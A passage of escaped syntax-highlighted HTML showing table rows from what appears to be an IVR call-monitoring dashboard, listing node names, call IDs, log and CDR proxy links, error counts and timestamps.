class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470632723<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150907<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">57<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21.548<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">01.004<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">tr <\/span><span class=\"crayon-v\">bgcolor<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eeeeee&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_1&amp;node=tb0ocmp1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470277023<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150907<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">19.660<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">01.003<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-171\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-173\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-174\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-175\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-176\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_40_420_0&amp;node=tb0ocmp0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_0xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_0xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1542000470860823<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 